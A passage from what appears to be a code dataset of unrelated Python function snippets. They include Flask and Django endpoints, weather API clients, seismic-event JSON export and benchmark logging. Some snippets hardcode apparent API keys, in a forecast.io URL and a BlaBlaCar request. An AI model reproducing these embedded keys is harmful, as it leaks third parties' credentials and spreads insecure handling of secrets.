mortality for each outcome\n\tc_total_mortality \t= primeCoordinator.output_counterfactual_mortality_total# counterfactual mortality sum up for all outcomes\n\ttotal_population\t= primeCoordinator.output_total_population\n\tall_mortality_exposure\t= primeCoordinator.output_all_mortality_exposure\n\ttotal_death_averted\t= str(round(primeCoordinator.output_total_death_averted,0))\n\ttotal_death_baseline\t= str(primeCoordinator.output_total_death_baseline)\n\n\t#transmit the parameters\n\ttemplate = loader.get_template('primemodel/index.html')\n\tpara_view = 
{\n\t\t\t'b_output_mortality_num':\tb_output_mortality_num,\n\t\t\t'b_total_mortality':\t\tb_total_mortality,\n\t\t\t'c_output_mortality_num':\tc_output_mortality_num,\n\t\t\t'c_total_mortality':\t\tc_total_mortality,\n\t\t\t'total_population':\t\ttotal_population,\n\t\t\t'total_death_averted':\t\ttotal_death_averted,\n\t\t\t'total_death_baseline':\t\ttotal_death_baseline,\n\t\t\t'all_mortality_exposure':\tall_mortality_exposure\n\t\t\t}\n\n\t#context to transmit the parameters to show\n\tcontext = Context(para_view)\n\tresponse = template.render(context)\n\treturn HttpResponse(response)", "def output_per_job_size_response_time(self):\r\n results_dirname = get_param('results_dir')\r\n num_tasks_to_response_times = {}\r\n for job in self.completed_jobs:\r\n if job.num_tasks not in num_tasks_to_response_times:\r\n num_tasks_to_response_times[job.num_tasks] = []\r\n num_tasks_to_response_times[job.num_tasks].append(\r\n job.response_time())\r\n \r\n n = get_param(\"num_tasks\")\r\n probes_ratio = get_param(\"probes_ratio\")\r\n for num_tasks, response_times in num_tasks_to_response_times.items():\r\n filename = os.path.join(\r\n results_dirname,\r\n \"%s_response_time_%s\" % (get_param(\"file_prefix\"),\r\n num_tasks))\r\n if get_param('first_time'):\r\n f = open(filename, 'w')\r\n f.write(\"n\\tProbesRatio\\tUtil.\\tMean\\tStdDev\\t99Pctl\\t\"\r\n \"NetworkDelay\\n\")\r\n f.close()\r\n f = open(filename, 'a')\r\n f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" %\r\n (n, probes_ratio, self.utilization,\r\n stats_mod.lmean(response_times), \r\n stats_mod.lstdev(response_times),\r\n stats_mod.lscoreatpercentile(response_times,.99),\r\n get_param(\"network_delay\")))\r\n f.close()", "def alerts_info(): \n\n\n user_id = session['user_id']\n user = User.query.get(user_id)\n lat = str(user.location.lat)\n lng = str(user.location.lng)\n\n r = requests.get('https://api.forecast.io/forecast/45713f3bbbe3402dbe4aff89c61caccd/' + lat + \",\" + lng)\n\n data = r.json()\n\n alerts = {\n 'apparentTemperature': data['currently']['apparentTemperature'],\n 'humidity': data['currently']['humidity'],\n \"nearestStormDistance\": data[\"currently\"][\"nearestStormDistance\"],\n \"summary\": data['currently'][\"summary\"], \n }\n\n return jsonify(alerts)", "def basic_stats(flights):\n return ...", "def pe_analysis():\r\n\r\n global params\r\n n = params['n']\r\n level = params['level']\r\n pemin = params['pemin']\r\n pemax = params['pemax']\r\n pestep = params['pestep']\r\n ns = params['ns']\r\n nt = params['nt']\r\n po = params['po']\r\n pf = params['pf']\r\n pe_dir = create_dir(TIMES_PATH + 'pe')\r\n filename = datetime.datetime.now().strftime(DATE_FORMAT) + '.csv'\r\n with open(pe_dir + filename, 'wb') as csvfile:\r\n fw = csv.writer(csvfile)\r\n fw.writerow(('lv', 'ns', 'nt', 'no', 'pe', 'ne', 'nf',\r\n 'method1', 'method2', 'method3_1', 'method3_2'))\r\n pe = pemin\r\n while pe <= pemax:\r\n no = max(int(round(po * nt)), 1)\r\n ne = max(int(round(pe * no)), 1)\r\n nf = max(int(round(pf * nt)), 1)\r\n times = [0] * 4\r\n for i in range(n):\r\n times = map(sum, zip(times, get_times(level, ns, nt, no, ne, nf)))\r\n show_progress('pe', pe, pemin, pemax, pestep, i, n)\r\n times = map(lambda x: float(x) / n, times)\r\n fw.writerow((level, ns, nt, no, pe, ne, nf) + tuple(times))\r\n pe += pestep\r\n csvfile.close()", "def _fetch_daily_internal(delta, swarming, process, endpoint, start, end, state,\n tags, parallel):\n out = {}\n with threading_utils.ThreadPool(1, parallel, 0) as pool:\n while start < end:\n cmd = 
_get_cmd(swarming, endpoint, _get_epoch(start),\n _get_epoch(start + delta), state, tags)\n pool.add_task(0, _run_json, start.strftime('%Y-%m-%d'), process, cmd)\n start += delta\n for k, v in pool.iter_results():\n sys.stdout.write('.')\n sys.stdout.flush()\n out[k] = v\n print('')\n return out", "def tobs():\n temps = engine.execute(\"SELECT date, tobs FROM Measurement WHERE date BETWEEN '2016-08-23' AND '2017-08-23'\").fetchall()\n\n # Convert list of tuples into normal list\n temps_list = list(np.ravel(temps))\n\n return jsonify(temps_list)", "def test(file, time, verbose):\n results = {\"wins\": 0, \"loses\": 0, \"turns\": [], \"timings\": []}\n click.echo(\" Starting the test\")\n file.write(\"[\")\n with click.progressbar(list(product(colors, repeat=4))) as bar:\n for goal in bar:\n timing = []\n if time:\n for i in range(4):\n start = timer()\n run(goal, verbose)\n end = timer()\n timing.append(end - start)\n start = timer()\n res = run(goal, verbose)\n end = timer()\n timing.append(end - start)\n res[\"time\"] = np.mean(timing)\n else:\n res = run(goal, verbose)\n file.write(json.dumps(res))\n file.write(\",\\n\")\n results[\"wins\" if res[\"result\"] else \"loses\"] += 1\n results[\"turns\"].append(res[\"turns\"])\n if timing:\n results[\"timings\"].append(res[\"time\"])\n file.write(\"]\")\n click.echo(\n f\"\"\"\\n Here are the results:\n I won {singular_or_plural(results['wins'], 'time')}\n I lost {singular_or_plural(results['loses'], 'time')}\n The average turn took {np.mean(results['turns'])} moves\"\"\"\n )\n if time:\n click.echo(f\" The average time was {np.mean(results['timings'])} seconds \\n\")", "def daily_stats():\r\n count_total_each_user.delay()\r\n delete_non_activated_account.delay()", "def getData(tme=currentTime):\n # attempts request 10 times\n for attempt in range(10):\n try:\n # make a request to the url and return it in json format\n url = \"https://api.darksky.net/forecast/%s/%s,%s,%s?exclude=minutely,hourly,daily,alerts,flags\" % (API_KEY, LAT, LNG, tme)\n return get(url).json()\n except:\n # Wait .05 seconds and try again\n sleep(.05)\n pass", "def stats():\n return jsonify(shorten.get_stats(get_db(), app.config['MINI_URL_BASE']))", "def store_info_json(tag_name, folder_name, ac, baz, peak2troughs, \n periods, zero_crossings_abs, station, startev, event,\n net_s, chan2, chan3, chan4, sta_s,\n loc_s, event_source, depth, magnitude):\n zv_max, nv_max, ev_max, rv_max, tv_max = peak2troughs[:]\n zv_per, nv_per, ev_per, rv_per, tv_per = periods[:]\n zv_zca, nv_zca, ev_zca, rv_zca, tv_zca = zero_crossings_abs[:]\n \n sampl_rate = ac[0].stats.sampling_rate\n TBA = baz[2] # Theoretical backazimuth [deg]\n distance = 0.001*baz[0]\n dic = OrderedDict([\n ('data', OrderedDict([\n ('translational', OrderedDict([\n ('network', net_s),\n ('station', sta_s),\n ('loc', loc_s),\n ('channel_N', chan3),\n ('channel_E', chan2),\n ('channel_Z', chan4)]))\n ])),\n ('event_id', event.resource_id.id),\n ('event_source', event_source),\n ('starttime', str(startev-180)),\n ('endtime', str(startev+3*3600)),\n ('station_latitude', str(ac[0].stats.coordinates['latitude'])),\n ('station_longitude', str(ac[0].stats.coordinates['longitude'])),\n ('event_latitude', event.preferred_origin().latitude),\n ('event_longitude', event.preferred_origin().longitude),\n ('magnitude', magnitude),\n ('depth', depth),\n ('depth_unit', 'km'),\n ('epicentral_distance', distance),\n ('epicentral_distance_unit', 'km'),\n ('theoretical_backazimuth', TBA),\n ('theoretical_backazimuth_unit', 'degree'),\n 
('peak_filtered_vertical_vel', zv_max),\n ('dominant_period_vertical_vel',zv_per),\n ('vertical_vel_zero_crossing',zv_zca),\n ('peak_filtered_north_vel', nv_max),\n ('dominant_period_north_vel',nv_per),\n ('north_vel_zero_crossing',nv_zca),\n ('peak_filtered_east_vel', ev_max),\n ('dominant_period_east_vel',ev_per),\n ('east_vel_zero_crossing',ev_zca),\n ('peak_filtered_radial_vel',rv_max),\n ('dominant_period_radial_vel',rv_per),\n ('radial_vel_zero_crossing',rv_zca),\n ('peak_filtered_transverse_vel',tv_max),\n ('dominant_period_transverse_vel',tv_per),\n ('transverse_vel_zero_crossing',tv_zca),\n ('peak_filtered_vel_unit', 'nm/s'),\n ('zero_crossing_unit','sec. from trace start')\n ])\n\n outfile = open(folder_name+station+'_'+tag_name+'.json', 'wt')\n json.dump(dic, outfile, indent=4)\n\n outfile.close()", "def calculate_demo(self, request, parent_lookup_client, pk, format=None):\n\n retirement_plan = self.get_object()\n tickers = Ticker.objects.filter(~Q(state=Ticker.State.CLOSED.value))\n portfolio = []\n projection = []\n for idx, ticker in enumerate(tickers[:10]):\n percent = 0\n if idx <= 9:\n # 10% each for first 10 tickers\n percent = 10\n portfolio.append([ticker.id, percent])\n # grab 50 evenly spaced time points between dob and current time\n today = timezone.now().date()\n last_day = retirement_plan.client.date_of_birth + relativedelta(years=retirement_plan.selected_life_expectancy)\n day_interval = (last_day - today) / 49\n income_start = 20000\n assets_start = 100000\n for i in range(50):\n income = income_start + (i * 50)\n assets = assets_start + (i * 1000)\n dt = today + i * day_interval\n projection.append([d2ed(dt), assets, income])\n return Response({'portfolio': portfolio, 'projection': projection})", "def _calc_times():\n\n app.logger.debug(\"Got a JSON request\")\n\n km = request.args.get('km', 999, type=float)\n distance = request.args.get('distance', 200, type=int)\n begin_time = request.args.get('begin_time', type=str)\n begin_date = request.args.get('begin_date', type=str)\n\n app.logger.debug(\"km={}\".format(km))\n app.logger.debug(\"request.args: {}\".format(request.args))\n\n print(begin_date + \" \" + begin_time)\n start_arrow = arrow.get(begin_date + \" \" + begin_time, \"YYYY-MM-DD HH:mm\")\n print('start', start_arrow.isoformat())\n\n open_time = acp_times.open_time(km, distance, start_arrow)\n close_time = acp_times.close_time(km, distance, start_arrow)\n result = {\"open\": open_time, \"close\": close_time}\n\n return flask.jsonify(result=result)", "async def test_source_up_to_dateness(self):\n response = await self.collect(get_request_json_return_value={\"timestamp\": \"1565284457173\"})\n expected_age = days_ago(datetime_fromtimestamp(1565284457173 / 1000.0))\n self.assert_measurement(response, value=str(expected_age))", "def get_tide_data():\n # Get raw JSON data\n magtag.url = get_data_source_url(hilo_only=False)\n raw_data = magtag.fetch()\n\n # Results will be stored in a list that is PLOT_WIDTH long\n new_tide_data = [PLOT_HEIGHT - 1] * PLOT_WIDTH\n\n # Convert raw data to display coordinates\n for data in raw_data:\n _, t = data[\"t\"].split(\" \") # date and time\n h, m = t.split(\":\") # hours and minutes\n v = data[\"v\"] # water level\n x = round((PLOT_WIDTH - 1) * (60 * float(h) + float(m)) / 1434)\n y = (PLOT_HEIGHT // 2) - round(VSCALE * float(v))\n y = 0 if y < 0 else y\n y = PLOT_HEIGHT - 1 if y >= PLOT_HEIGHT else y\n new_tide_data[x] = y\n\n return new_tide_data", "def Tobs_given_day(date):\n\n results = 
session.query(Measurement.date,Measurement.tobs).\\\nfilter(Measurement.date.between(One_yrs_ago,current_time)).\\\nfilter(func.strftime(\"%Y-%m-%d\",Measurement.date)==date).all()\n \n results1=[results[i][1] for i in range(len(results))]\n results={results[0][0]:results1}\n print(f\"Route /api/v1.0/precipitation/<date> with <date>={date} is being visited\")\n return jsonify(results)", "def stats(self):", "def measurements():\n print(\"server received request for precipitation data...\")\n return jsonify(measurements_data)", "def cat():\n echo_json(fetch_holidays())", "def _print_detail(peak: Activity, max: Dict[str, List[int]]):\n\n # Find the date, start time, and duration.\n rowid = format(peak.rowid, \"<5d\")\n date = peak.start_time.strftime(\"%a %d %b, %Y\")\n start = peak.start_time.strftime(\"%H:%M\")\n duration = str(peak.end_time - peak.start_time).rjust(8)\n\n # Find the activity name\n distance = (format(round(peak.distance / 1000, 2), \".2f\") + \"km\").rjust(8)\n elevation = (str(peak.elevation) + \"m\").rjust(6) if peak.elevation else \"\".rjust(6)\n activity_name = peak.activity_name.ljust(80) if peak.activity_name else \"\".ljust(80)\n\n # Find each peak value.\n p5sec = str(peak.peak_5sec_hr).rjust(4) if peak.peak_5sec_hr else \" \"\n p30sec = str(peak.peak_30sec_hr).rjust(4) if peak.peak_30sec_hr else \" \"\n p60sec = str(peak.peak_60sec_hr).rjust(4) if peak.peak_60sec_hr else \" \"\n p5min = str(peak.peak_5min_hr).rjust(4) if peak.peak_5min_hr else \" \"\n p10min = str(peak.peak_10min_hr).rjust(4) if peak.peak_10min_hr else \" \"\n p20min = str(peak.peak_20min_hr).rjust(4) if peak.peak_20min_hr else \" \"\n p30min = str(peak.peak_30min_hr).rjust(4) if peak.peak_30min_hr else \" \"\n p60min = str(peak.peak_60min_hr).rjust(4) if peak.peak_60min_hr else \" \"\n p90min = str(peak.peak_90min_hr).rjust(4) if peak.peak_90min_hr else \" \"\n p120min = str(peak.peak_120min_hr).rjust(4) if peak.peak_120min_hr else \" \"\n\n # Helper to decorate a peak with ANSI escape sequence highlights.\n def _decorate(val: int, max: List[int], label: str) -> str:\n if max is None or val is None:\n return label\n if val >= max[0]:\n label = \"\\x1B[37;41m\" + label + \"\\x1B[0m\"\n elif val >= max[1]:\n label = \"\\x1B[30;43m\" + label + \"\\x1B[0m\"\n elif len(max) > 2 and val >= max[2]:\n label = \"\\x1B[30;47m\" + label + \"\\x1B[0m\"\n return label\n\n # Highlight those peaks in this activity that are the highest peak we've ever seen.\n p5sec = _decorate(peak.peak_5sec_hr, max[\"5sec\"], p5sec)\n p30sec = _decorate(peak.peak_30sec_hr, max[\"30sec\"], p30sec)\n p60sec = _decorate(peak.peak_60sec_hr, max[\"60sec\"], p60sec)\n p5min = _decorate(peak.peak_5min_hr, max[\"5min\"], p5min)\n p10min = _decorate(peak.peak_10min_hr, max[\"10min\"], p10min)\n p20min = _decorate(peak.peak_20min_hr, max[\"20min\"], p20min)\n p30min = _decorate(peak.peak_30min_hr, max[\"30min\"], p30min)\n p60min = _decorate(peak.peak_60min_hr, max[\"60min\"], p60min)\n p90min = _decorate(peak.peak_90min_hr, max[\"90min\"], p90min)\n p120min = _decorate(peak.peak_120min_hr, max[\"120min\"], p120min)\n\n # Print the data.\n print(\n f\"{rowid} {date} {activity_name} {distance} {elevation} {start} {duration} {p5sec} {p30sec} {p60sec} {p5min} {p10min} {p20min} {p30min} {p60min} {p90min} {p120min}\"\n )", "def update_stats():\r\n\turl = \"https://www.pathofexile.com/\" + \"api/trade/data/stats\"\r\n\tsave_path = \"data/stats.json\"\r\n\tr = requests.get(url)\r\n\twith open(save_path, \"w\") as 
fileID:\r\n\t\tfileID.write(r.text)", "def mark_tasks(data):\n try:\n i =0\n while i<30:\n new_date = (date.today() + timedelta(days=i)).strftime(\"%d-%m-%Y\")\n if data.get(new_date)==None:\n i+=1\n continue\n \n os.system(\"clear\")\n message = \"\"\" \\t\\t===============Mark tasks ============== \"\"\"\n print(message)\n print(\"\\nAt date: \", new_date)\n new_lst = [[x[0],idx] for idx,x in enumerate(data[new_date]) if x[1]<0]\n\n for j in range(len(new_lst)):\n print(\"\\t-{} {}\".format(j+1, new_lst[j][0]))\n \n if len(new_lst)==0:\n i+=1\n print(\"\\tNo tasks remaining here.\") \n continue\n\n c1 = int(\"0\"+input(\"\\nChoose the task between [{}-{}] to mark as complete. \\nChoose {} or more to goto next date. \\nChoose 0 to terminate: \".format(min(1,len(new_lst)),len(new_lst), len(new_lst)+1)))\n \n if c1==0:\n break\n elif c1>len(new_lst):\n i+=1\n continue\n \n # c2 = int(input(\"\\nChoose the task between [1-{}] to mark as complete: \".format(len(new_lst))))\n \n data[new_date][new_lst[c1-1][1]][1]*=-1\n print(\"\\n[$$$]Marked as complete!!!\\n\")\n c2 = int(\"0\"+input(\"Mark more here? y(0), n(anything else): \"))\n if c2!=0:\n i+=1\n # json.dump(data,open(TODO_FILE, \"w+\"))\n\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt\")\n except :\n print(\"Some error occurred\")\n finally:\n write_file(data)", "def rpm_since_float(since):\n data = monitor.get_current_workout()\n return jsonify(data)", "def main():\n # Load and parse json object from file with specific\n file_name = \"./benchmark.log\"\n doc = re.sub(\"[\\n|\\t]\", \"\", \"\".join(benchmark.read_text_file(file_name)))\n json_object = json.loads(\"\".join(doc))\n\n intervals = json_object[\"intervals\"]\n\n socket_keys = benchmark.get_socket_keys(intervals)\n\n result = benchmark.get_result_dictionary(intervals, socket_keys)\n\n print_to_csv(result, socket_keys)", "def read_emijrp_json(json_file):\n with open(json_file, \"rb\") as f:\n data = json.load(f)\n f.close()\n count = 0\n previous_count = 0\n tz = WlmTZ()\n daily_count = dict() # upload count by day\n total_count = dict() # cumulative upload count by day\n user_count = dict() # upload count by user\n userd_count = dict() # user count by day\n usernd_count= dict() # new user count by day\n for k in data:\n image_info = data[k]\n user = image_info[u'username']\n datetime_image = parse_date(image_info[u'date'].strip(), tz)\n date_image = datetime.datetime.strftime(datetime_image, \"%Y-%m-%d\")\n\n if(datetime_image.date()>=START and datetime_image.date()<END) and (image_info['country']==THIS_WLM):\n #user\n if user in user_count:\n user_count[user] = user_count[user]+1\n else:\n user_count[user] = 1\n if date_image in daily_count:\n daily_count[date_image] = daily_count[date_image] +1\n total_count[date_image] = total_count[date_image] + 1\n if(not (user in userd_count[date_image])):\n userd_count[date_image].append(user)\n else:\n previous_count = count -1\n daily_count[date_image] = 1\n total_count[date_image] = previous_count +1\n userd_count[date_image] = []\n usernd_count[date_image] = []\n userd_count[date_image].append(user)\n if(user_count[user] <= 1):\n usernd_count[date_image].append(user)\n count = count +1\n return {\n 'count': count,\n 'daily count': daily_count,\n 'total count': total_count,\n 'user count': user_count,\n 'user count by day': userd_count,\n 'new user count by day': usernd_count\n }", "def search_for_trips(date, start_point, end_point):\n # round date to next hour to adapt to api's behavior\n url = 
'https://public-api.blablacar.com/api/v3/trips'\n\n    # formated_date = date + timedelta(seconds=3599)\n    formated_date = dt(date.year,date.month,date.day,date.hour)\n    formated_date = dt.strftime(formated_date, '%Y-%m-%dT%H:%m:%S')\n    params = { 'key' : '4RiVIJL2JNqgR9qH2ISI4afoRZ9Humgx',\n                'from_coordinate' : str(start_point[0]) + ',' + str(start_point[1]),\n                'to_coordinate' : str(end_point[0]) + ',' + str(end_point[1]),\n                'currency' : 'EUR',\n                'locale' : 'fr-FR',\n                'start_date_local': formated_date,\n                'count' : 10\n                }\n\n    time_before_call = time.perf_counter()\n    # logger.info('just before the trainline post')\n    response = requests.get(url, params=params)\n\n    if response.status_code == 200:\n        return format_blablacar_response(response.json(), date, start_point, end_point)\n    else :\n        print(response.json())", "def main():\n # Pull variables from pf\n profileref = pfget('google_mapfeed.pf', profile)\n dbname = profileref['dbname']\n path = profileref['webbase']\n finalfile = '%s/%s' % (path, profileref['file'])\n bufferfile = '%s+' % finalfile\n max_nquakes = 600\n element_fields = ['lat', 'lon', 'depth', 'time', 'local_timestring', 'utc_timestring', 'magnitude', 'auth']\n\n if verbose:\n print \"Start: Creating main JSON file '%s' for all stations at %s\" % (finalfile, time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime()))\n\n now = time.time()\n # Set time zone\n os.putenv('TZ','US/Pacific')\n time.tzset()\n if verbose:\n print \"The time zone is: %s\" % (time.tzname)[0]\n print \"The current time is: %s\" % now\n\n # Override defaults\n if override_number:\n if verbose:\n print \"Overriding default number of events (%d) with %d\" % (max_nquakes, override_number)\n nquakes = override_number\n else:\n nquakes = max_nquakes\n if override_timerange:\n if verbose:\n print \"Overriding default number of events (%d) with time range %d seconds\" % (max_nquakes, override_timerange)\n nquakes = False\n\n # Database processing\n if verbose:\n print \"Opening database\";\n print \"Number of events requested: %s\" % nquakes\n db = dbopen(dbname, 'r')\n\n '''\n Occasionally there is more than one magnitude for a single orid\n (such as provided by QED). We need the most recent magnitude for\n a given orid, so sort on orid and lddate, then group on orid,\n then get the most recent record number (greatest lddate) for each\n group. 
Add that to a dictionary we will use later.\n '''\n netmag_dict = {}\n db_netmag = dblookup(db, table='netmag')\n db_netmag.sort(['orid', 'lddate'])\n db_netmag_grp = dbgroup(db_netmag, 'orid')\n if verbose:\n print \"There are %s records\" % db_netmag_grp.query('dbRECORD_COUNT')\n for i in range(db_netmag_grp.query('dbRECORD_COUNT')):\n db_netmag_grp[3] = i\n orid, [dbptr, view, end_record, start_record] = db_netmag_grp.getv('orid', 'bundle')\n if verbose:\n print \"\\t- Iteration: %s: Orid: %s, Start record: %s, End record: %s\"% (i, orid, start_record, end_record)\n db_netmag[3] = end_record - 1\n if verbose:\n print \"\\t\\t- Magnitude: %s, Magtype: %s\" % (db_netmag.getv('magnitude')[0], db_netmag.getv('magtype')[0] )\n magnitude, magtype = db_netmag.getv('magnitude', 'magtype')\n netmag_dict[orid] = { 'rec':end_record, 'magnitude':magnitude, 'magtype':magtype }\n\n '''\n if verbose:\n for key in sorted(netmag_dict.iterkeys()):\n print \"%s: %s\" % (key, netmag_dict[key])\n '''\n\n '''\n Now get the event information\n '''\n db.lookup(table='origin')\n db.join('event')\n if verbose:\n print \"Number of joined records of event and origin tables: %s\" % db.query('dbRECORD_COUNT')\n if override_timerange:\n override_oldest = now - override_timerange\n if verbose:\n print \"Override time defined - get events in the last %s seconds - 'time >= %s'\" % (override_timerange, override_oldest)\n db.subset('time >= %d' % override_oldest)\n if verbose:\n print \"Subset on time. Number of records: %s\" % db.query('dbRECORD_COUNT')\n # Join views\n # db_joined = dbjoin(db, db_netmag)\n\n if verbose:\n print \"Subset orid == prefor\"\n db.subset('orid == prefor')\n if verbose:\n print \"Number of subsetted records: %s\" % db.query('dbRECORD_COUNT')\n print \"Subset for time != NULL\"\n db.subset('time != NULL')\n if verbose:\n print \"Number of subsetted records: %s\" % db.query('dbRECORD_COUNT')\n # We want the most recent first for the comparison with nquakes\n db.sort(['time'], reverse=True)\n if verbose:\n print \"Number of sorted records: %s\" % db.query('dbRECORD_COUNT')\n if nquakes:\n if db.query('dbRECORD_COUNT') > nquakes:\n db[3] = nquakes - 1\n min_time = db.getv('time')[0]\n db.subset(\"time >= %s\" % min_time)\n else:\n override_oldest = now - override_timerange\n if verbose:\n print \"Override time defined - get events in the last %s seconds - time > %s\" % (override_timerange, override_oldest)\n db.subset(\"time >= %s\" % override_oldest)\n # Sort in normal time - we want the most recent events plotted on top\n db.sort(('time'))\n if verbose:\n print \"Number of records without subset on time: %s\" % db.query('dbRECORD_COUNT')\n '''\n Build event dictionary\n '''\n event_dict = {'metadata':{},'events':{}}\n\n '''\n Build metadata dictionary\n '''\n if nquakes:\n event_dict['metadata']['max_nquakes'] = nquakes\n event_dict['metadata']['oldest_time_readable'] = epoch2str( int(min_time), \"%H:%M UTC %A %B %o, %Y\" )\n event_dict['metadata']['oldest_time'] = int(min_time)\n event_dict['metadata']['type'] = 'event_limited'\n elif override_oldest:\n event_dict['metadata']['time_range'] = int(override_timerange)\n event_dict['metadata']['oldest_time_readable'] = epoch2str( int(override_oldest), \"%H:%M UTC %A %B %o, %Y\" )\n event_dict['metadata']['oldest_time'] = int(override_oldest)\n event_dict['metadata']['type'] = 'time_limited'\n event_dict['metadata']['modification_time'] = int(time.time())\n event_dict['metadata']['modification_time_readable'] = epoch2str( int(time.time()), \"%H:%M 
UTC %A %B %o, %Y\" )\n\n '''\n Build event dictionary\n '''\n events = {}\n for i in range(db.query('dbRECORD_COUNT')):\n db[3] = i\n if verbose:\n epoch_time, orid = db.getv('time', 'orid')\n print \"\\tRecord number is: %s Orid is: %d Time is: %s\" % (db[3], orid, epoch2str(epoch_time, '%Y-%m-%d %H:%M:%S'))\n\n orid = db.getv('orid')[0]\n\n if orid in netmag_dict:\n events[i] = {}\n for ef in element_fields:\n # Parse values\n if ef is 'local_timestring' or ef is 'utc_timestring' or ef is 'time':\n value = dbgetv(db, 'time')[0]\n difference = float(now) - float(value)\n if difference < 6 * 3600:\n color = 'red'\n elif difference < 12 * 3600:\n color = 'orange'\n elif difference < 24 * 3600:\n color = 'yellow'\n elif difference < 72 * 3600:\n color = 'chartreuse'\n elif difference < 168 * 3600:\n color = 'blue'\n else:\n color = 'grey'\n events[i]['color'] = color\n elif ef is 'depth':\n value = dbgetv(db, 'depth')[0]\n elif ef is 'auth':\n value = dbgetv(db, 'auth')[0]\n elif ef is 'magnitude':\n # Magnitude\n # mlval, mbval, msval, magnitudeval, magtypeval = db.getv('ml', 'mb', 'ms', 'magnitude', 'magtype')\n # Null magnitude is -999.00\n magnitudeval = netmag_dict[orid]['magnitude']\n magtypeval = netmag_dict[orid]['magtype']\n if int(magnitudeval) > 0:\n scale = magtypeval\n value = '%.1f' % magnitudeval\n else:\n scale = ''\n value = 'N/A'\n events[i]['scale'] = scale\n else:\n value = dbgetv(db, ef)\n\n # Override formatting for specific fields\n if ef is 'lat' or ef is 'lon':\n value = '%.4f' % value\n elif ef is 'local_timestring':\n value = epoch2str( value, \"%H:%M:%S %Z %A %B %o, %Y\", \"US/Pacific\" )\n elif ef is 'utc_timestring':\n value = epoch2str( value, \"%H:%M:%S UTC %A %B %o, %Y\" )\n events[i][ef] = value\n\n full_lat, full_lon = db.getv('lat', 'lon')\n events[i]['grname'] = (grname(full_lat,full_lon)).title()\n events[i]['srname'] = (srname(full_lat,full_lon)).title()\n\n event_dict['events'] = events\n\n # Dump JSON file\n f = open(bufferfile, 'w') \n json.dump(event_dict, f, sort_keys=True, indent=2)\n f.flush()\n\n # Move the file to replace the older one\n try:\n os.rename(bufferfile, finalfile)\n except OSError:\n print \"Cannot rename JSON file from %s to %s\" % (bufferfile,finalfile)\n\n if verbose:\n print \"End: Creating main JSON file '%s' for all stations %s\" % (finalfile, time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime()))\n\n db.close()\n return 0", "def ajax_get_statistics():\r\n return jsonify(generate_statistics())", "def process_weather(forecast_file):\n # Load json data file\n \n with open(forecast_file) as json_file:\n json_data = json.load(json_file)\n \n # Set Variables, Dictionaries and Lists\n days_list = []\n temp_dict = {}\n daily_dict = {}\n\n num_items = 0\n total_sum_min = 0\n total_sum_max = 0\n days = len(json_data['DailyForecasts'])\n days_list = days_in_data(days)\n\n t_temp_min = 100\n t_temp_max = 0\n\n # Pull through the data\n\n for day in days_list:\n num_items += 1\n date = convert_date(json_data['DailyForecasts'][day]['Date'])\n min_temp = convert_f_to_c(json_data['DailyForecasts'][day]['Temperature']['Minimum']['Value'])\n total_sum_min += min_temp\n max_temp = convert_f_to_c(json_data['DailyForecasts'][day]['Temperature']['Maximum']['Value'])\n total_sum_max += max_temp\n day_desc = json_data['DailyForecasts'][day]['Day']['LongPhrase']\n chance_rain_day = json_data['DailyForecasts'][day]['Day']['RainProbability']\n night_desc = json_data['DailyForecasts'][day]['Night']['LongPhrase']\n chance_rain_night = 
json_data['DailyForecasts'][day]['Night']['RainProbability']\n \n if min_temp < t_temp_min:\n t_temp_min = min_temp\n t_temp_mindate = date\n else:\n pass\n if max_temp > t_temp_max:\n t_temp_max = max_temp\n t_temp_maxdate = date\n else:\n pass\n \n daily_dict[day] = [date, min_temp, max_temp, day_desc, chance_rain_day, night_desc, chance_rain_night]\n # 0 1 2 3 4 5 6 \n \n # print(temp_dict)\n # print(daily_dict)\n\n # Calculate Minimum, Maximum and Mean temperatures\n\n mean_min = format_temperature(calculate_mean(total_sum_min, num_items))\n # print(mean_min)\n mean_max = format_temperature(calculate_mean(total_sum_max, num_items))\n # print(mean_max)\n\n # Format Minimum and Maximum temperatures\n min_temp_format = format_temperature(t_temp_min)\n max_temp_format = format_temperature(t_temp_max)\n\n ##############################################################################################\n\n # Combine string messages to return to user\n\n str_Output = \"\"\n Output_gen1 = (f\"{num_items} Day Overview\\n\")\n Output_gen2 = (f\" The lowest temperature will be {min_temp_format}, and will occur on {t_temp_mindate}.\\n\")\n Output_gen3 = (f\" The highest temperature will be {max_temp_format}, and will occur on {t_temp_maxdate}.\\n\")\n Output_gen4 = (f\" The average low this week is {mean_min}.\\n\")\n Output_gen5 = (f\" The average high this week is {mean_max}.\\n\")\n str_Output = Output_gen1 + Output_gen2 + Output_gen3 + Output_gen4 + Output_gen5\n for key, value in daily_dict.items():\n Output_daily0 = (\"\\n\")\n Output_daily1 = (f\"-------- {value[0]} --------\\n\")\n Output_daily2 = (f\"Minimum Temperature: {format_temperature(value[1])}\\n\")\n Output_daily3 = (f\"Maximum Temperature: {format_temperature(value[2])}\\n\")\n Output_daily4 = (f\"Daytime: {value[3]}\\n\")\n Output_daily5 = (f\" Chance of rain: {value[4]}%\\n\")\n Output_daily6 = (f\"Nighttime: {value[5]}\\n\")\n Output_daily7 = (f\" Chance of rain: {value[6]}%\\n\")\n str_Output = str_Output + Output_daily0 + Output_daily1 + Output_daily2 + Output_daily3 + Output_daily4 + Output_daily5 + Output_daily6 + Output_daily7\n str_Output = str_Output +\"\\n\"\n\n return str_Output", "def tstamps():\n\n # Parse the URL parameters \"begin\" and \"length\".\n errors = list()\n try:\n begin = flask.request.args.get('begin')\n t_begin = coils.string2time(begin)\n assert t_begin != None\n except:\n errors.append('Failed to parse \"begin\" parameter.')\n try:\n length = int(flask.request.args.get('length'))\n except:\n errors.append('Failed to parse \"length\" parameter.')\n\n # Bail on any errors.\n if errors:\n return flask.jsonify(errors=errors)\n\n # Compute the end time.\n t_end = t_begin + dt.timedelta(seconds=length) if length > 0 else dt.datetime.now()\n\n # Retrieve image timestamps.\n images = db.session.query(mapping.Image.time).\\\n filter(mapping.Image.time > t_begin).\\\n filter(mapping.Image.time < t_end).\\\n group_by(mapping.Image.time).all()\n images = [ii[0] for ii in images]\n\n return flask.jsonify(\n size=len(images),\n images=images,\n )", "def timetaken_vs_support(confidence_threshold, coverage_threshold, top_k_rules):\n print(\"\\nPlotting time taken to extract rules vs support_threshold\\n\")\n print(\"top_k_rules is {}\".format(top_k_rules))\n print(\"Confidence 